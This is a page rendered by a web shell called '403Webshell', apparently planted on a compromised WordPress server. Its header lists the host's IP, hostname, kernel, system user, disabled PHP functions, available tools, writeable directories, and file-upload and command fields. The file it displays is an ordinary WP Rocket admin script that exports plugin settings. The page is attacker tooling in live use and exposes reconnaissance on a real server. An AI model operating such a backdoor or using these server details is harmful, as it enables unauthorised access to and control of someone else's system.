403Webshell
Server IP : 62.60.133.156  /  Your IP : 216.73.217.51
Web Server : LiteSpeed
System : Linux linux24.centraldnserver.com 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
User : mimradmin ( 1166)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, exec, popen, proc_open
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : OFF
Directory :  /proc/self/cwd/wp-content/plugins/wp-rocket/assets/js/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /proc/self/cwd/wp-content/plugins/wp-rocket/assets/js/wpr-admin-common.js
jQuery( document ).ready( function( $ ){
var sent = false;
	$( '.rocket-dismiss' ).on( 'click', function( e ) {
		e.preventDefault();
		var url = $( this ).attr( 'href' ).replace( 'admin-post', 'admin-ajax' );
		$.get( url ).done( $( this ).closest( '.notice' ).hide( 'slow' ) );
	});

	$( '#deactivate' ).click( function() {
		$( '#export_settings' ).prop( 'checked', false );
		$( '#export_settings' ).hide();
		$( 'label[for=export_settings]' ).hide();
	});

	$( '#safe_mode' ).click( function() {
		$( '#export_settings' ).show();
		$( 'label[for=export_settings]' ).show();
		$( '#export_settings' ).prop( 'checked', true );
	});

	$( '#wpr-deactivation-intent-form' ).submit(function (e) {
		const checked = $( '#export_settings' ).prop('checked');
		if(! checked || sent) {
			return true;
		}

		e.preventDefault();
		$.ajax( {
			url: rocket_option_export.rest_url_option_export,
			method: 'GET',
			success: function( data, textStatus, xhr ) {
				const disposition = xhr.getResponseHeader('content-disposition');

				const filenames = disposition.match('filename="([^"]+)"');

				if(! filenames.length) {
					return;
				}

				const filename = filenames.pop();

				const url = URL.createObjectURL( new Blob( [ JSON.stringify(data, null, 2) ], {
					type: "octet/stream"
				}));

				var a = document.createElement("a");
				document.body.appendChild(a);
				a.style = "display: none";
				a.href = url;
				a.download = filename;
				a.click();
				window.URL.revokeObjectURL(url);
			},
			complete: function () {
				sent = true;
				$( '#wpr-deactivation-intent-form' ).submit();
			}
		} );

		return true;
	});
} );

Youez - 2016 - github.com/yon3zu